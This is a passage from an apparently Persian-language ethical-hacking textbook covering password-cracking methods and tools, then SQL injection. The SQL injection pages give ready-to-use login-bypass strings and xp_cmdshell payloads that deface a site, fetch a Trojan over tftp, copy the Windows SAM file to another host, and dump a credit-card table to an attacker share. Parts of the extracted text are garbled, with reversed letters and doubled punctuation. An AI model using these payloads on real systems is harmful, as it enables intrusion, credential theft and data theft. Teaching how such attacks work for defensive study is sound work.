داﺷﺘﻪ ﺑﺎﺷﺪ و ﻣﻲ ﺗﻮاﻧﺪ backdoor ﻳﺎ ﺗﺮوﺟﺎن ﻧﺼﺐ ﻛﻨﺪ . ﻫﻤﭽﻨﻴﻦ ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﻳﻚ ﻧﺮم اﻓﺰار اﺳﺘﺮاق ﺳﻤﻊ ﺷﺒﻜﻪ ﺑﺮ روي آن ﻧﺼﺐ ﻛﻨﺪ ﺗﺎ ﺗﺮاﻓﻴﻚ داﺧﻠﻲ ﺷﺒﻜﻪ را sniff ﻛﻨﺪ ﺑﻨﺎﺑﺮاﻳﻦ ﺑﻪ ﺑﺴﻴﺎري از اﻃﻼﻋﺎت ﺷﺒﻜﻪ دﺳﺘﺮﺳﻲ ﺧﻮاﻫﺪ داﺷﺖ.

ﭘﺴﻮرد ﻛﺮﻛﺮ ﭼﮕﻮﻧﻪ ﻛﺎر ﻣﻲ ﻛﻨﺪ؟

اوﻟﻴﻦ ﻣﺮﺣﻠﻪ در dictionary attack ، ﺗﻮﻟﻴﺪ ﻟﻴﺴﺘﻲ از ﭘﺴﻮردﻫﺎي ﺑﺎﻟﻘﻮه اﺳﺖ ﻛﻪ ﻣﻲ ﺗﻮان آﻧﻬﺎ را رد دﻳﻜﺸﻨﺮي ﻳﺎﻓﺖ . ﻣﻌﻤﻮﻻ ﻫﻜﺮ اﻳﻦ ﻟﻴﺴﺖ را ﺑﺎ اﺳﺘﻔﺎده از ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﺗﻮﻟﻴﺪ ﻛﻨﻨﺪه دﻳﻜﺸﻨﺮي ﻳﺎ دﻳﻜﺸﻨﺮي ﻫﺎﻳﻲ ﻛﻪ ﺑﻪ راﺣﺘﻲ از ﻃﺮﻳﻖ اﻳﻨﺘﺮﻧﺖ ﻗﺎﺑﻞ داﻧﻠﻮد ﻫﺴﺘﻨﺪ، اﻳﺠﺎد ﻣﻲ ﻛﻨﺪ . ﺎﻤﻠﻛ ت اﻳﻦ ﻟﻴﺴﺖ، رﻣﺰﮔﺬاري ﻳﺎ hash ﻣﻲ ﺪﻧﺷﻮ و ﭙﺳ ﺲ ﺑﺮاي ﻳﺎﻓﺘﻦ ﭘﺴﻮرد اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد . ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ ﭘﺴﻮرد hash ﺷﺪه را از ﻃﺮﻳﻖ اﺳﺘﺮاق ﺳﻤﻊ ﺷﺒﻜﻪ ( واﻳﺮﻟﺲ ﻳﺎ ﻛﺎﺑﻠﻲ) ، ﻳﺎ ﺑﻄﻮر ﻣﺴﺘﻘﻴﻢ از ﻃﺮﻳﻖ ﻓﺎﻳﻞ SAM ﺑﻪ دﺳﺖ آورد و در ﻧﻬﺎﻳﺖ، ﺑﺮﻧﺎﻣﻪ، ﭘﺴﻮرد رﻣﺰ ﻧﺸﺪه را ﻧﻤﺎﻳﺶ ﻣﻲ دﻫﺪ . .

161

اﮔﺮ ﻛﺎرﺑﺮي از ﭘﺴﻮرد ﭘﻴﭽﻴﺪه اﺳﺘﻔﺎده ﻛﻨﺪ، از روش brute force ﺑﺮاي ﺷﻜﺴﺘﻦ آن ﺑﺎﻳﺪ اﺳﺘﻔﺎده ﺷﻮد . در اﻳﻦ ﺣﻤﻠﻪ، ﺗﺮﻛﻴﺐ ﺗﻤﺎم ﺣﺎﻻت ﻣﻤﻜﻦ از ﺣﺮوف، اﻋﺪاد و ﻛﺎراﻛﺘﺮﻫﺎي ﺧﺎص ﺗﺴﺖ ﻣﻲ ﺷﻮد ﻛﻪ ﻧﺴﺒﺖ ﺑﻪ ﺣﻤﻠﻪ دﻳﻜﺸﻨﺮي، زﻣﺎن زﻳﺎدي را ﻣﻲ ﮔﻴﺮد ﺑﺮاي اﻳﻨﻜﻪ ﺗﻌﺪاد ﺟﺎﻳﮕﺸﺖ ﻫﺎي آن ﺑﺴﻴﺎر زﻳﺎد اﺳﺖ . .

ﺣﻤﻼت ﺑﺮاي ﺷﻜﺴﺘﻦ ﭘﺴﻮرد : دﺳﺘﻪ ﺑﻨﺪي

ﺳﻪ ﻧﻮع ﺣﻤﻠﻪ ﺑﺮاي ﺷﻜﺴﺘﻦ ﭘﺴﻮرد وﺟﻮد دارد : :

Dictionary : ﻛﻠﻤﺎت ﻣﻮﺟﻮد در دﻳﻜﺸﻨﺮي را ﺑﺮاي ﺑﺮرﺳﻲ، ﭼﻚ ﻣﻲ ﻛﻨﺪ . .

Brute force : ﺗﺮﻛﻴﺐ ﺗﻤﺎم ﺣﺎﻻت ﺣﺮوف، اﻋﺪاد، و ﻛﺎراﻛﺘﺮﻫﺎي ﻣﺨﺼﻮص را ﭼﻚ ﻣﻲ ﻛﻨﺪ . .

Hybrid : از ﺗﺮﻛﻴﺐ ﻛﻠﻤﺎت دﻳﻜﺸﻨﺮي ﺑﺎ ﻳﻚ ﻋﺪد ﻳﺎ ﻛﺎراﻛﺘﺮ ﻣﺨﺼﻮص ﺑﻪ ﻋﻨﻮان ﺟﺎﻳﮕﺰﻳﻦ ﻳﻚ ﺣﺮف، اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . .

اﺑﺰارﻫﺎي ﻫﻚ

Cain & Abel ، اﺑﺰاري ﺑﺮاي ﺷﻜﺴﺘﻦ ﭘﺴﻮرد در ﻣﺤﻴﻂ ﻫﺎي وﻳﻨﺪوزي اﺳﺖ ﻛﻪ اﺟﺎزه ﺑﺎزﻳﺎﺑﻲ اﻧﻮاع ﻣﺨﺘﻠﻒ ﭘﺴﻮرد را ﺑﺎ اﺳﺘﻔﺎده از اﺳﺘﺮاق ﺳﻤﻊ ﺷﺒﻜﻪ ﻣﻲ دﻫﺪ و ﺑﺎ اﺳﺘﻔﺎده از ﺣﻤﻼت dictionary و brute force ، ﭘﺴﻮردﻫﺎ را ﻣﻲ ﺷﻜﻨﺪ . ﻫﻤﭽﻨﻴﻦ ياراد ﻗﺎﺑﻠﻴﺘﻲ ﺑﻪ ﻧﺎم ARP اﺳﺖ ﻛﻪ اﻣﻜﺎن اﺳﺘﺮاق ﺳﻤﻊ در ﺷﺒﻜﻪ ﻫﺎي ﺳﻮﺋﻴﭽﻲ را ﻣﻲ دﻫﺪ . .

(Lophtcrack (LC4 ، ﻳﻜﻲ از راﻳﺞ ﺗﺮﻳﻦ ﻧﺮم اﻓﺰارﻫﺎي ﺷﻜﺴﺘﻦ ﭘﺴﻮرد اﺳﺖ ﻛﻪ ﭘﺴﻮردﻫﺎي اﻛﺎﻧﺖ وﻳﻨﺪوزي ﻛﺎرﺑﺮ را ﺑﺎزﻳﺎﺑﻲ ﻣﻲ ﻛﻨﺪ . .

John the Ripper ، ﻧﺮم اﻓﺰار ﺷﻜﺴﺘﻦ ﭘﺴﻮرد در ﻳﻮﻧﻴﻜﺲ اﺳﺖ ﻛﻪ ﭼﻨﺪﻳﻦ ﺣﺎﻟﺖ ﻛﺮك را در ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﻗﺮار داده اﺳﺖ . .

162

Gammaprog ، ﻧﺮم اﻓﺰار ﺷﻜﺴﺘﻦ ﭘﺴﻮرد ﺑﺮاي آدرس ﻫﺎي اﻳﻤﻴﻞ ﻣﺒﺘﻨﻲ ﺑﺮ وب اﺳﺖ ﻛﻪ از POP3 ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣﻲ ﻛﻨﺪ . .

MessenPass ، اﺑﺰاري ﺑﺮاي ﺑﺎزﻳﺎﺑﻲ ﭘﺴﻮرد اﺳﺖ ﻛﻪ ﭘﺴﻮردﻫﺎي Yahoo Messanger ، MSN Messanger ، و Google Talk را آﺷﻜﺎر ﻣﻲ ﻛﻨﺪ . .

Password Spectator ، ﻧﺮم اﻓﺰاري اﺳﺖ ﻛﻪ ﭘﺴﻮرد واﻗﻌﻲ ﭘﺸﺖ ﺳﺘﺎره ﻫﺎ را ﻧﺸﺎن ﻣﻲ دﻫﺪ . اﻳﻦ ﻧﺮم اﻓﺰار ﻫﻢ ﺑﺎ ﺑﺮﻧﺎﻣﻪ ﻫﺎ و ﻫﻢ ﺑﺎ وب ﺳﺎﻳﺖ ﻛﺎر ﻣﻲ ﻛﻨﺪ . .

Webcracker ، اﺑﺰاري اﺳﺖ ﻛﻪ از ﻳﻚ ﻟﻴﺴﺖ ﺑﺮاي ﺗﺴﺖ ورود ﺑﻪ وب ﺳﺮور اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ . ﺑﻪ دﻧﺒ ﺎل ﭘﺎﺳﺦ " HTTP object moved 302" ﻣﻲ ﮔﺮدد ﺗﺎ ﭘﺴﻮرد را ﺣﺪس ﺑﺰﻧﺪ . ﺑﺎ اﺳﺘﻔﺎده از اﻳﻦ ﭘﺎﺳﺦ، اﻳﻦ اﺑﺰار ﻣﻲ ﺗﻮاﻧﺪ ﻧﻮع اﺣﺮاز ﻫﻮﻳﺖ ﻣﻮرد اﺳﺘﻔﺎده را ﺗﻌﻴﻴﻦ ﻛﻨﺪ و از آن ﺑﺮاي ورود ﺑﻪ ﺳﻴﺴﺘﻢ اﺳﺘﻔﺎده ﻛﻨﺪ . .

ﺑﺮﺧﻲ دﻳﮕﺮ از اﺑﺰارﻫﺎي ﻫﻚ ﻋﺒﺎرﺗﻨﺪ از : Munga ، WebCracker ، RAR ، Hydra ، Authforce ، Obiwan ، Brutus WWWhack ، RockXP ، Wireless WEP Key Password Spy ، SnadBoy ، PassList ، Bunga ، Advanced Mailbox Password Recovery ، Atomic Mailbox Password Cracker ، Passwordstate ، Messenger Key ، Mail PassView ، Networl Password Recovery ، و SniffPass . .

ﻫﻤﭽﻨﻴﻦ ﺑﺮﺧﻲ از اﺑﺰارﻫﺎي اﻣﻨﻴﺘﻲ ﺑﺮاي ﭘﺴﻮرد ﻋﺒﺎرﺗﻨﺪ از : Password Administrator ، WebPassword ، PassReminder ، Easy Web Password ، Password Safe ، و My Password Manager . .

163

ﻓﺼﻞ ﻢﻧﻬ

SQL Injection و Buffer Overflow

ﻣﻘﺪﻣﻪ

ﺣﻤﻼت SQL injection و Buffer overflow ، از اﻳﻦ ﻧﻈﺮ ﻣﺸﺎﺑﻪ ﻫﻢ ﻫﺴﺘﻨﺪ ﻛﻪ ﻫﺮ دو از ﻃﺮﻳﻖ ﻛﺎدر ورودي ( input box ) ﻛﺎرﺑﺮ اﻧﺠﺎم ﻣﻲ ﮔﻴﺮﻧﺪ . ﻛﺎدر ورودي ﻛﺎرﺑﺮ، ﺟﺎﺋﻲ اﺳﺖ ﻛﻪ ﻣﻤﻜﻦ اﺳﺖ ﻛﺎرﺑﺮي، ﻧﺎم ﻛﺎرﺑﺮي و ﻛﻠﻤﻪ ﻋﺒﻮر ﺧﻮد را در ﻳﻚ وب ﺳﺎﻳﺖ وارد ﻛﻨﺪ، ﻳﺎ داده ﻫﺎﻳﻲ ﺑﻪ URL اﺿﺎﻓﻪ ﻛﻨﺪ و ﻳﺎ ﺟﺴﺘﺠﻮﻳﻲ ﺑﺮاي ﻳﻚ ﻛﻠﻤﻪ در ﻳﻚ ﺑﺮﻧﺎﻣﻪ اﻧﺠﺎم دﻫﺪ . .

آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎي SQL injection و Buffer overflow ﻫﺮ دو ﺑﻪ ﺧﺎﻃﺮ ﻳﻚ ﻣﺸﻜﻞ اﻧﺠﺎم ﻣﻲ ﮔﻴﺮﻧﺪ : ﭘﺎراﻣﺘﺮﻫﺎي ﻧﺎدرﺳﺖ ( invalid ). اﮔﺮ ﺑﺮﻧﺎﻣﻪ ﻧﻮﻳﺴﺎن، زﻣﺎن ﻛﺎﻓﻲ ﺑﺮاي ﺑﺮرﺳﻲ ﻣﺘﻐﻴﺮﻫﺎﻳﻲ ﻛﻪ ﻛﺎرﺑﺮ ﻣﻲ ﺗﻮاﻧﺪ وارد ﻛﻨﺪ ﺻﺮف ﻧﻜﻨﻨﺪ، ﻧﺘﺎﻳﺞ ﺟﺪي و ﻏﻴﺮ ﻗﺎﺑﻞ ﭘﻴﺶ ﺑﻴﻨﻲ ﺑﻪ ﻫﻤﺮاه ﺧﻮاﻫﺪ داﺷﺖ . ﻫﻜﺮﻫﺎي ﺣﺮﻓﻪ اي، ﻣﻲ ﺗﻮاﻧﻨﺪ از اﻳﻦ آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎ اﺳﺘﻔﺎده ﻛﻨﻨﺪ و ﺳﻴﺴﺘﻢ ﻳﺎ ﺑﺮﻧﺎﻣﻪ را ﺧﺎﻣﻮش ﻛﻨﻨﺪ ﻳﺎ shell ﺑﮕﻴﺮﻧﺪ ﺗﺎ دﺳﺘﻮرات ﺧﻮد را اﺟﺮا ﻛﻨ .ﺪﻨ .ﺪﻨ

SQL Injection ﭼﻴﺴﺖ؟

در ﻃﻮل ﺣﻤﻠﻪ SQL injection ، ﻛﺪ ﻣﺨﺮب وارد ﻓﻴﻠﺪﻫﺎي وب ﻓﺮم ﻣﻲ ﺷﻮد ﻳﺎ ﻛﺪﻫﺎي وب ﺳﺎﻳﺖ، ﺳﺒﺐ اﺟﺮاي shell ﻳﺎ دﺳﺘﻮرات دﻟﺨﻮاه دﻳﮕﺮ ﻣﻲ ﺷﻮﻧﺪ . ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ از ﻃﺮﻳﻖ ﻓﻴﻠﺪﻫﺎي وب ﻓﺮم ، دﺳﺘﻮراﺗﻲ ﺑﻪ SQL server اﺿﺎﻓﻪ ﻛﻨﺪ . ﺑﺮاي ﻣﺜﺎل، دﺳﺘﻮرات ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ Cmd ر ا ﺑﺎز ﻛﻨﺪ و ﻳﺎ ﺟﺪاول ﭘﺎﻳﮕﺎه داده را ﻧﻤﺎﻳﺶ دﻫﺪ . ﻣﻤﻜﻦ اﺳﺖ ﺟﺪول ﭘﺎﻳﮕﺎه داده ﺷﺎﻣﻞ اﻃﻼﻋﺎت ﺷﺨﺼﻲ از ﻗﺒﻴﻞ ﺷﻤﺎره ﻫﺎي ﻛﺎرت اﻋﺘﺒﺎري، ﺷﻤﺎره ﺷﻨﺎﺳﻨﺎﻣﻪ ﻫﺎ و ﻳﺎ ﭘﺴﻮردﻫﺎ ﺑﺎﺷﺪ . ﺑﺴﻴﺎري از ﺳﺎزﻣﺎن ﻫﺎ ﺑﺮاي ذﺧﻴﺮه ﺳﺎزي داده ﻫﺎي ﻣﺤﺮﻣﺎﻧﻪ ﺧﻮد از ﭘﺎﻳﮕﺎه داده ﻫﺎي SQL server اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﻨﺪ . ﺑﻪ ﻫﻤﻴﻦ ﺧﺎﻃﺮ، SQL server ﻫﺎ ﻫﺪف ﺑﺎ ارزﺷﻲ ﺑﺮاي ﻫﻜﺮﻫﺎ ﻫﺴﺘﻨﺪ . .

165

SQL Injection ، از ﺑﺮﻧﺎﻣﻪ ﻫﺎي وب ﺳﻮ اﺳﺘﻔﺎده ﻣﻲ ﻛﻨﺪ و ﻫﻜﺮ را ﻗﺎدر ﻣﻲ ﺳﺎزد ﺗﺎ دﺳﺘﻮرات ﻏﻴﺮ ﻣﺠﺎز SQL را اﺟﺮا ﻛﻨﺪ . ﻫﻤﭽ ﻨﻴﻦ، از ﻣﺰاﻳﺎي ﻛﻮﺋﺮي ﻫﺎي ﻧﺎ اﻣﻦ در ﺑﺮﻧﺎﻣﻪ ﻫﺎي وب ﺳﻮ اﺳﺘﻔﺎده ﻛﺮده و ﻛﻮﺋﺮي ﻫﺎي SQL ﻣﻲ ﺳﺎزد ﺑ. ﻪ ﺑ. ﻋﻨﻮان ﻣﺜﺎل زﻣﺎﻧﻴﻜﻪ ﻛﺎرﺑﺮي ﺑﺎ اﺳﺘﻔﺎده از ﻧﺎم ﻛﺎرﺑﺮي و ﻛﻠﻤﻪ ﻋﺒﻮر ﻗﺼﺪ ﻻﮔﻴﻦ ﻛﺮدن دارد، از ﻛ ﻮﺋﺮي SQL اﺳﺘﻔﺎده ﻣﻲ ﺪﻨﻛ . ﺑﺎ اﻳﻦ ﺣﺎل، ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ از SQL injection ﺑﺮاي ارﺳﺎل ﻧﺎم ﻛﺎرﺑﺮي و ﻛﻠﻤﻪ ﻋﺒﻮر ﺗﺼﻨﻌﻲ اﺳﺘﻔﺎده ﻛﻨﺪ و ﻛﻮﺋﺮي اﺻﻠﻲ SQL را آﻟﻮده ﺳﺎزد . .

ﻣﺮاﺣﻞ اﻧﺠﺎم SQL injection

ﻗﺒﻞ از اﺟﺮاي ﺣﻤﻠﻪ SQL injection ، ﻫﻜﺮ ﺑﺎﻳﺪ ﻣﺸﺨﺺ ﻛﻨﺪ ﻛﻪ آﻳﺎ ﭘﻴﻜﺮﺑﻨﺪي ﭘﺎﻳﮕﺎه داده و ﺟﺪاول و ﻣﺘﻐﻴﺮﻫﺎي ﻣﺮﺑﻮﻃﻪ، آﺳﻴﺐ ﭘﺬﻳﺮ ﻫﺴﺘﻨﺪ ﻳﺎ ﻧﻪ . ﻣﺮاﺣﻞ ﺗﻌﻴﻴﻦ آﺳﻴﺐ ﭘﺬﻳﺮي SQL server ﻋﺒﺎرﺗﻨﺪ از : :

.1 از ﻣﺮورﮔﺮ وب اﺳﺘﻔﺎده ﻛﻨﻴﺪ و ﺑﻪ دﻧﺒﺎل وب ﺳﺎﻳﺘﻲ ﺑﺎﺷﻴﺪ ﻛﻪ اﺟﺎزه ارﺳﺎل داده را ﺑﻪ ﻛﺎرﺑﺮ ﻣﻲ دﻫﺪ ﺑﺮاي ﻣﺜﺎل، ﺻﻔﺤﻪ ﻻﮔﻴﻦ ، ﺻﻔﺤﻪ ﺟﺴﺘﺠﻮ، ﻳﺎ ﺻﻔﺤﺎﺗﻲ ﻛﻪ ﻓﻴﻠﺪﻫﺎﻳﻲ ﺑﺮاي ورود داده ﺑﻪ ﭘﺎﻳﮕﺎه داده دارد ( از ﻗﺒﻴﻞ ﻓﺮم " I forget my password" ). ﺑﺎ ﺑﺮرﺳﻲ ﻛﺪ ﺳﺎﻳﺖ، ﺑﻪ دﻧﺒﺎل ﺻﻔﺤﺎت وﺑﻲ ﺑﺎﺷﻴﺪ ﻛﻪ دﺳﺘﻮرات POST ﻳﺎ GET را ﻧﻤﺎﻳﺶ ﻣﻲ دﻫﻨﺪ . اﮔﺮ از ﻣﺘﺪ POST اﺳﺘﻔﺎده ﺷﺪه ﺑﺎﺷﺪ، در URL ﺳﺎﻳﺖ، ﭘﺎراﻣﺘﺮي ﻣﺸﺎﻫﺪه ﻧﻤﻲ ﻛﻨﻴﺪ . ﻛﺪ ﺻﻔﺤﻪ را ﺑﺮرﺳﻲ ﻛﻨﻴﺪ ﺗﺎ اﻃﻼﻋﺎت ﻣﻔﻴ ﺪي از آن ﺑﺮداﺷﺖ ﻛﻨﻴﺪ . ﺑﺮاي ﺗﺸﺨﻴﺺ GET ﻳﺎ POST ﺑﻮدن، ﺑﻪ دﻧﺒﺎل ﺗﮓ

در ﻛﺪ ﺑﺎﺷﻴﺪ:

اﮔﺮ وارد ﻧﺸﺪ، ﺻﻔﺤﺎﺗﻲ ﺷﺒﻴ ﻪ CHI ، JSP ، ASP ، ﻳﺎ PHP را ﺑﺮرﺳﻲ ﻛﻨﻴﺪ ﻳﺎ ﺑﻪ دﻧﺒﺎل URL ﻫﺎﻳﻲ ﺑﺎﺷﻴﺪ ﻛﻪ ﺑﻪ ﻋﻨﻮان ﻣﺜﺎل، ﭘﺎراﻣﺘﺮ زﻳﺮ را ﺑﮕﻴﺮد : : http://www.xsecurity.com/index.asp?id=10 در ﻣﺜﺎل ﺑﺎﻻ، ﻫﻜﺮ ﻣﻲ ﺗﻮاﻧﺪ از ﻋﺒﺎرت زﻳﺮ اﺳﺘﻔﺎده ﻛﻨﺪ : : http://www.xsecurity.com/index.asp?id=blah' or 1=1—

166

.SQL server 2 را ﺑﺎ اﺳﺘﻔﺎده از ﻛﻮﺗﺎي ﺧﺎﻟﻲ ( ' ' ) ﺗﺴﺖ ﻛﻨﻴﺪ . ﺑﺎ اﻳﻨﻜﺎر ﻣﻲ ﻓﻬﻤﻴﺪ ﻛﻪ آﻳﺎ ﻣﺘﻐﻴﺮ ورودي ﻛﺎرﺑﺮ، ﺗﻮﺳﻂ ﺳﺮور ﺑﺼﻮرت ﺗﺤﺖ اﻟﻠﻔﻈﻲ ﺗﻔﺴﻴﺮ ﻣﻲ ﺷﻮد ﻳﺎ ﻧﻪ . اﮔﺮ ﺳﺮور، ﭘﺎﺳﺨﻲ ﺑﺎ ﭘﻴﺎم 'a'='a' ﺑﺪﻫﺪ ( ﻳﺎ ﭼﻴﺰي ﻣﺸﺎﺑﻪ اﻳﻦ) ، آﻧﮕﺎه ﺑﻪ اﺣﺘﻤﺎل زﻳﺎد ﻣﺴﺘﻌﺪ ﺣﻤﻠﻪ SQL injection اﺳﺖ . اﮔﺮ زﻣﺎﻧﻴﻜﻪ از (' ) ﺑﻪ ﻋﻨﻮان ﻧﺎم ﻛﺎرﺑﺮي اﺳﺘﻔﺎده ﻛﻨﻴﺪ و ﭘﻴﻐﺎم زﻳﺮ ﻧﺸﺎن داده ﺷﻮد، ﻳﻌﻨﻲ ﺑﺮاي ﺣﻤﻠﻪ SQL Injection آﺳﻴﺐ ﭘﺬﻳﺮ اﺳﺖ.

.3 از دﺳﺘﻮر SELECT ﺑﺮاي ﺑﺎزﻳﺎﺑﻲ داده و INSERT ﺑﺮاي اﺿﺎﻓﻪ ﻛﺮدن اﻃﻼﻋﺎت ﺑﻪ ﭘﺎﻳﮕﺎه داده اﺳﺘﻔﺎده ﻛﻨﻴﺪ.

167

آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎي SQL Server

در اﻳﻨﺠﺎ ﭼﻨﺪ ﻣﺜﺎل از ﻣﺘﻐﻴﺮﻫﺎﻳﻲ ﻛﻪ ﺑﺮاي ﺗﺴﺖ آﺳﻴﺐ ﭘﺬﻳﺮي ﻫﺎي SQL در ﻓﺮم وب اﺳﺘﻔﺎده ﻣﻲ ﺷﻮد آورده ﺷﺪه اﺳﺖ : :

از ﻳﻚ ﻛﻮﺗﺎ (' ) در ﻛﺎدر ورودي اﺳﺘﻔﺎده ﻛﻨﻴﺪ:

Blah' or 1=1—

Login: blah' or 1=1—

Password:: blah' or 1=1— http://search/index.asp?id=blah’ or 1=1—

ﻤﻫ ﻴﻨﭽ ﻦ زا ﺎﻫﺪﻛ ي ﺮﻳز ﺰﻴﻧ ﻣ ﻲ ﺪﻴﻧاﻮﺗ ياﺮﺑ SQL Injection اﺳﺘﻔﺎده ﻛﻨﻴﺪ : :

'or 1=1 --

"or 1=1 -- or 1=1 --

' or 'a'='a

" or "a"="a

') or ('a'='a)

") or ("a"="a)

ﺑﺴﺘﻪ ﺑﻪ ﺳﺎﺧﺘﺎر ﭘﺎﻳﮕﺎه داده، ﻣﻤﻜﻦ اﺳﺖ ﻛﻪ اﻳﻦ دﺳﺘﻮرات و ﻣﺘﻐﻴﺮﻫﺎي ﻣﺸﺎﺑﻪ، اﺟﺎزه دور زدن ﻻﮔﻴﻦ را ﺑﻪ ﺷﻤﺎ ﺑﺪﻫﻨﺪ . زﻣﺎﻧﻴﻜﻪ اﻳﻦ دﺳﺘﻮرات را در ﻓﻴﻠﺪ ﻓﺮم وارد ﻣﻲ ﻛﻨﻴﺪ، ﻣﻤﻜﻦ اﺳﺖ ﺳﻄﺮﻫﺎي زﻳﺎدي از ﺟﺪول ﻳﺎ ﺣﺘﻲ ﺗﻤﺎم ﺟﺪول ﭘﺎﻳﮕﺎه داده را ﺑﺮﮔﺮداﻧﺪ ﺑﺮاي اﻳﻨﻜﻪ SQL server ، ﺑﺼﻮرت ﺗﺤﺖ اﻟﻠﻔﻈﻲ آﻧﻬﺎ را ﺗﻔﺴﻴﺮ ﻣﻲ ﻛﻨﺪ . دو ﻋﻼﻣﺖ ﻣﻨﻬﺎ ﻛﻪ در ﭘﺎﻳﺎن دﺳﺘﻮر ﮔﺬاﺷﺘﻪ ﺷﺪه اﺳﺖ، ﺑﻪ SQL ﻣﻲ ﮔﻮﻳﺪ ﻛﻪ ﺑﺎﻗﻴﻤﺎﻧﺪه دﺳﺘﻮرات را ﻧﺎدﻳﺪه ﺑﮕﻴﺮد . .

در اﻳﻨﺠﺎ ﭼﻨﺪ ﻣﺜﺎل از ﭼﮕﻮﻧﮕﻲ اﺳﺘﻔﺎده از دﺳﺘﻮرات SQL ﺑﺮاي اﺟﺮاي دﺳﺘﻮرات ﺳﻴﺴﺘﻢ ﻋﺎﻣﻞ آورده ﺷﺪه اﺳﺖ : :

ﺑﺮاي ﮔﺮﻓﺘﻦ ﻟﻴﺴﺖ داﻳﺮﻛﺘﻮري، ﻣﺘﻦ زﻳﺮ را در ﻓﻴﻠﺪ ﻓﺮم وارد ﻛﻨﻴﺪ : :

Blah’;exec master..xp_cmdshell “dir c:\*.* /s >c:\directory.txt”--

168

ﺑﺮاي اﻳﺠﺎد ﻳﻚ ﻓﺎﻳﻞ، ﻣﺘﻦ زﻳﺮ را در ﻓﻴﻠﺪ ﻓﺮم وارد ﻛﻨﻴﺪ : :

Blah’;exec master..xp_cmdshell “echo hacker-was-here > c:\hacker.txt”--

ﺑﺮاي ping ﻛﺮدن ﻳﻚ آدرس IP ، ﻣﺘﻦ زﻳﺮ را در ﻓﻴﻠﺪ ﻓﺮم وارد ﻛﻨﻴﺪ : :

Blah’;exec master..xp_cmdshell “ping 192.168.1.1”--

ﺗﻐﻴﻴﺮ ﻳﻚ ﺻﻔﺤﻪ وب ( ﺑﺎ ﻓﺮض اﻳﻨﻜﻪ ﺑﻪ دﻟﻴﻞ اﺷﺘﺒﺎه در ﭘﻴﻜﺮﺑﻨﺪي، اﺟﺎزه write داده ﺷﺪه اﺳﺖ ):

Blah’;exec master..xp_cmdshell “echo you-are-defaced >

c:\inetpub\WWW.root\index.htm"--

اﺟﺮاي ﺑﺮﻧﺎﻣﻪ ( ﺗﻨﻬﺎ ﺑﺮﻧﺎﻣﻪ ﻫﺎي ﻏﻴﺮ ﮔﺮاﻓﻴﻜﻲ ): ):

Blah’;exec master..xp_cmdshell “cmd.exe /c appname.exe"--

آﭘﻠﻮد ﻳﻚ ﺗﺮوﺟﺎن ﺑﻪ ﺳﺮور : :

Blah’;exec master..xp_cmdshell “tftp -i 10.0.0.4 GET Trojan.exe

C:\trojan.exe"--

داﻧﻠﻮد ﻳﻚ ﻓﺎﻳﻞ از ﺳﺮور : :

Blah’;exec master..xp_cmdshell “tftp –i 10.0.0.4 put

C:\winnt\repair\SAM SAM" --

ﺑﺮاي ذﺧﻴﺮه ﺧﺮوﺟﻲ در ﻳﻚ ﻓﺎﻳﻞ HTML ، از sp_makewebtask اﺳﺘﻔﺎده ﻛﻨﻴﺪ . ﺑﺮاي ﻣﺜﺎل ﺑﺮاي ذﺧﻴﺮه ﺟﺪوﻟﻲ ﺑﻪ ﻧﺎم creditcard در ﭘﻮﺷﻪ اي ﻛﻪ ﻫﻜﺮ ﺑﻪ اﺷﺘﺮاك ﮔﺬاﺷﺘﻪ اﺳﺖ، از دﺳﺘﻮر زﻳﺮ اﺳﺘﻔﺎده ﻛﻨﻴﺪ : :

Blah';EXEC master..sp_makewebtask "\\10.10.1.4\share\creditcard.html",

"SELECT * FROM CREDITCARD"

ﺑﺮﺧﻲ از اﺑﺰارﻫﺎي ﺧﻮدﻛﺎر ﺑﺮاي SQL injection ﻋﺒﺎرﺗﻨﺪ از : :

SQLPoke ، Database Scanner ، AppDetective ، SQL2.exe ، SQLSmack ، SQLbf ، SqlExec ، SQLDict ، NGSSQuirreL ، NGSSQLCrack ، و SQLPing v2.2 . .

169

Blind SQL Injection

ﻳﻜﻲ از روش ﻫﺎي ﻫﻚ اﺳﺖ ﻛﻪ اﺟﺎزه دﺳﺘﺮﺳﻲ ﻫﻜﺮ ﺑﻪ ﻳﻚ وب ﺳﺮور را ﻣﻲ دﻫﺪ و ﺑﺮ اﺳﺎس ﻳﻚ اﺷﺘﺒﺎه راﻳﺞ ﻛﺎر ﻣﻲ ﻛﻨﺪ : ﺑﺮﻧﺎﻣﻪ، داده ﻫﺎ را ﺑﺪون ﺑﺮرﺳﻲ، از ﻛﻼﻳﻨﺖ ﻣﻲ ﭘﺬﻳﺮد و ﻛﻮﺋﺮي ﻫﺎي SQL را اﺟﺮا ﻣﻲ ﻛﻨﺪ . ﻫﻜﺮ ﻣﻲﺗ ﻮاﻧﺪ ﻣﺤﺘﻮاي ﭘﺎﻳﮕﺎه داده را اﺳﺘﺨﺮاج، اﺻﻼح، اﺿﺎﻓﻪ ﻳﺎ ﺣﺬف ﻛﻨﺪ . .

